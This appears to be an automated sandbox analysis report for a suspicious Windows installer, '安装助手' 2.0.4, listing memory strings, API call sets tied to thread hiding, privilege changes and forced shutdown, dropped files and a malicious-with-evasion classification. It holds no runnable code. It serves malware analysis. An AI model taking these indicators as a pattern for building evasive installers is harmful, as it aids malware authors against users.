Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.00000000044F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.00000000044F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.00000000044F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://ocsp.digicert.com0A
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.00000000044F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://ocsp.digicert.com0C
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.00000000044F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://ocsp.digicert.com0H
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.00000000044F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://ocsp.digicert.com0I
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.00000000044F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://ocsp.digicert.com0X
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.00000000044F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://www.digicert.com/CPS0
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.00000000044F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.0000000004999000.00000004.00001000.00020000.00000000.sdmp, is-AQRNC.tmp.6.drString found in binary or memory: http://www.metalinker.org/
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.0000000004999000.00000004.00001000.00020000.00000000.sdmp, is-AQRNC.tmp.6.drString found in binary or memory: http://www.metalinker.org/basic_string::_M_construct
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.0000000004999000.00000004.00001000.00020000.00000000.sdmp, is-AQRNC.tmp.6.drString found in binary or memory: https://aria2.github.io/
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.0000000004999000.00000004.00001000.00020000.00000000.sdmp, is-AQRNC.tmp.6.drString found in binary or memory: https://aria2.github.io/Usage:
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.0000000004999000.00000004.00001000.00020000.00000000.sdmp, is-AQRNC.tmp.6.drString found in binary or memory: https://github.com/aria2/aria2/issues
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000003.1783318029.0000000004999000.00000004.00001000.00020000.00000000.sdmp, is-AQRNC.tmp.6.drString found in binary or memory: https://github.com/aria2/aria2/issuesReport
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exeString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exe, 00000000.00000003.1692948774.0000000002F40000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.exe, 00000000.00000003.1693303041.000000007EBFB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000000.1694925449.0000000000E01000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000006.00000000.1786864198.0000000000DBD000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.5.dr, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.0.drString found in binary or memory: https://www.innosetup.com/
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exe, 00000000.00000003.1692948774.0000000002F40000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.exe, 00000000.00000003.1693303041.000000007EBFB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000000.1694925449.0000000000E01000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000006.00000000.1786864198.0000000000DBD000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.5.dr, #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.0.drString found in binary or memory: https://www.remobjects.com/ps

Operating System Destruction

barindex
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess information set: 01 00 00 00 Jump to behavior

System Summary

barindex
Source: update.vac.1.drStatic PE information: section name: .=~
Source: update.vac.6.drStatic PE information: section name: .=~
Source: hrsw.vbc.6.drStatic PE information: section name: .=~
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6BF43886 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6BF43886
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6C0C5120 NtSetInformationThread,OpenSCManagerA,CloseServiceHandle,OpenServiceA,CloseServiceHandle,6_2_6C0C5120
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6C0C5D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,6_2_6C0C5D60
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6BF43A6A NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6BF43A6A
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6BF439CF NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6BF439CF
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6BF43D62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6BF43D62
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6BF43D18 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6BF43D18
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6BF43C62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6BF43C62
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6BF41950: CreateFileA,DeviceIoControl,CloseHandle,6_2_6BF41950
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6BF44754 _strlen,CreateFileA,CreateFileA,CloseHandle,_strlen,std::ios_base::_Ios_base_dtor,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,TerminateProcess,GetCurrentProcess,TerminateProcess,_strlen,Sleep,ExitWindowsEx,Sleep,DeleteFileA,Sleep,_strlen,DeleteFileA,Sleep,_strlen,std::ios_base::_Ios_base_dtor,6_2_6BF44754
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6BF54A276_2_6BF54A27
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6BF447546_2_6BF44754
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6C0C18806_2_6C0C1880
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6C0C6A436_2_6C0C6A43
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6C126CE06_2_6C126CE0
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6C173D506_2_6C173D50
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6C179E806_2_6C179E80
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6C0F8EA16_2_6C0F8EA1
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6C112EC96_2_6C112EC9
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6C16E8106_2_6C16E810
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6C18A9306_2_6C18A930
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6C0F89726_2_6C0F8972
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6C1799F06_2_6C1799F0
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6C16FA506_2_6C16FA50
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6C171AA06_2_6C171AA0
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6C184AA06_2_6C184AA0
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6C16DAD06_2_6C16DAD0
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6C110B666_2_6C110B66
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6C100BCA6_2_6C100BCA
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6C11540A6_2_6C11540A
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6C1725806_2_6C172580
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6C17F5C06_2_6C17F5C0
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6C1796E06_2_6C1796E0
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6C1997006_2_6C199700
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6C0FC7CF6_2_6C0FC7CF
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6C1700206_2_6C170020
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6C1837506_2_6C183750
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B181EC10_2_00B181EC
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00AEE00A10_2_00AEE00A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B581C010_2_00B581C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B522E010_2_00B522E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B6824010_2_00B68240
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B6C3C010_2_00B6C3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B7230010_2_00B72300
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B3E49F10_2_00B3E49F
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B604C810_2_00B604C8
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B525F010_2_00B525F0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B4A6A010_2_00B4A6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B466D010_2_00B466D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B4865010_2_00B48650
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B6E99010_2_00B6E990
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B4C95010_2_00B4C950
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B2094310_2_00B20943
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B52A8010_2_00B52A80
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B2AB1110_2_00B2AB11
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B56CE010_2_00B56CE0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B48C2010_2_00B48C20
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B64EA010_2_00B64EA0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B60E0010_2_00B60E00
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B310AC10_2_00B310AC
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B5D08910_2_00B5D089
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B5518010_2_00B55180
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B4B18010_2_00B4B180
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B4D1D010_2_00B4D1D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B691C010_2_00B691C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B3B12110_2_00B3B121
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B6112010_2_00B61120
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B6D2C010_2_00B6D2C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B6720010_2_00B67200
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B5F3A010_2_00B5F3A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B353F310_2_00B353F3
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00AFB3E410_2_00AFB3E4
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00AD53CF10_2_00AD53CF
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B6F3C010_2_00B6F3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B1D49610_2_00B1D496
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B654D010_2_00B654D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B5F42010_2_00B5F420
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B4741010_2_00B47410
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B6D47010_2_00B6D470
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B6F59910_2_00B6F599
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B6353010_2_00B63530
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B7351A10_2_00B7351A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B4F50010_2_00B4F500
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00AD157210_2_00AD1572
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B6155010_2_00B61550
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B5D6A010_2_00B5D6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B7360110_2_00B73601
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B2965210_2_00B29652
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00AD97CA10_2_00AD97CA
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B677C010_2_00B677C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00AE976610_2_00AE9766
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00AFF8E010_2_00AFF8E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B6D9E010_2_00B6D9E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B4F91010_2_00B4F910
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00AD1AA110_2_00AD1AA1
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B57AF010_2_00B57AF0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B23AEF10_2_00B23AEF
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00AEBAC910_2_00AEBAC9
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00AEBC9210_2_00AEBC92
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B57C5010_2_00B57C50
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B4FDF010_2_00B4FDF0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B55E8010_2_00B55E80
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B55F8010_2_00B55F80
Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\Windows NT\hrsw.vbc 05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess token adjusted: SecurityJump to behavior
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 00AD1E40 appears 82 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 00B6FB10 appears 720 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 00AD28E3 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: String function: 6C196F10 appears 415 times
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: String function: 6C0F9240 appears 31 times
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.5.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exeStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.5.drStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.0.drStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exe, 00000000.00000003.1693303041.000000007EEFA000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.4.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exe, 00000000.00000003.1692948774.000000000305E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.4.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exe, 00000000.00000000.1691567795.0000000000949000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.4.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exeBinary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.4.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: tProtect.dll.12.drBinary string: \Device\TfSysMon
Source: tProtect.dll.12.drBinary string: \Device\TfKbMonPWLCache
Source: classification engineClassification label: mal96.evad.winEXE@144/32@0/0
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6C0C5D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,6_2_6C0C5D60
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00AD9313 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,10_2_00AD9313
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00AE3D66 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,10_2_00AE3D66
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00AD9252 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW,10_2_00AD9252
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6C0C5240 CreateToolhelp32Snapshot,CloseHandle,Process32NextW,Process32FirstW,6_2_6C0C5240
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpFile created: C:\Program Files (x86)\Windows NT\is-F1F4B.tmpJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7376:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7380:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8052:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8116:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8156:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4960:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8128:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1456:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3748:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7856:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6036:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7828:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7696:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4476:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4856:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7844:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4488:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3272:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7684:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3940:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3052:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5476:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2312:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2520:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2056:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8168:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8160:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7400:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8100:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4956:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8092:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3384:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7944:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7684:120:WilError_03
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exeFile created: C:\Users\user\AppData\Local\Temp\is-A58KC.tmpJump to behavior
